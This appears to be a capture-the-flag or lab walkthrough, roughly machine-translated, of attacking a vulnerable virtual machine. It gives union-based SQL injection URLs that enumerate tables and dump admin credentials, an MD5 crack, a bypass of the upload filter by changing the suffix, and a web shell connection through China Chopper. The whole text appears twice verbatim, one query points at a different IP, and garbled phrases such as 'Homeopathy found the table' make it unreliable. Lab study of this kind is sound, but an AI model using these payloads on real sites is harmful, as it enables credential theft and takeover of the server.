1. sql injection
First build a virtual machine and scan the current network segment with kali to find a suspicious ip address of 192.168.1.130
Open the webpage provided by the virtual machine and use it to find that there may be sql injection points
http://192.168.1.130/cat.php?id=1
http://192.168.1.130/cat.php?id=1'
Use the order by statement to try out the number of columns in the background database table of the website. When order by 5, the webpage reports an error, so the query involves four column elements
Use a federated query to view the display position of a web page
It is found that 2 is the echo bit, and the name of the database is found to be photoblog
http://192.168.1.130/cat.php?id=-2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘photoblog’
Homeopathy found the table in the database, we can see that the users table is useful to us
http://192.168.1.130/cat.php?id=-2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘users’
Continue to query the column names in the users table, there are variable names id, login, password
View the data in the users table: id=1 login=admin password=8efe310f9ab3efae8d410a8e0166eb2
http://192.168.138.134/cat.php?id=-1 union select 1,group_concat(id,0x23,login,0x23,password),3,4 from users
After MD5 decryption, the password P4ssw0rd is obtained
Login to the admin page
Trying to upload a file, found nophp
After changing the suffix name, it is found that it can be bypassed and uploaded successfully
Get the directory and connect it with a kitchen knife
First build a virtual machine and scan the current network segment with kali to find a suspicious ip address of 192.168.1.130
Open the webpage provided by the virtual machine and use it to find that there may be sql injection points
http://192.168.1.130/cat.php?id=1
http://192.168.1.130/cat.php?id=1'
Use the order by statement to try out the number of columns in the background database table of the website. When order by 5, the webpage reports an error, so the query involves four column elements
Use a federated query to view the display position of a web page
It is found that 2 is the echo bit, and the name of the database is found to be photoblog
http://192.168.1.130/cat.php?id=-2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘photoblog’
Homeopathy found the table in the database, we can see that the users table is useful to us
http://192.168.1.130/cat.php?id=-2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘users’
Continue to query the column names in the users table, there are variable names id, login, password
View the data in the users table: id=1 login=admin password=8efe310f9ab3efae8d410a8e0166eb2
http://192.168.138.134/cat.php?id=-1 union select 1,group_concat(id,0x23,login,0x23,password),3,4 from users
After MD5 decryption, the password P4ssw0rd is obtained
Login to the admin page
Trying to upload a file, found nophp
After changing the suffix name, it is found that it can be bypassed and uploaded successfully
Get the directory and connect it with a kitchen knife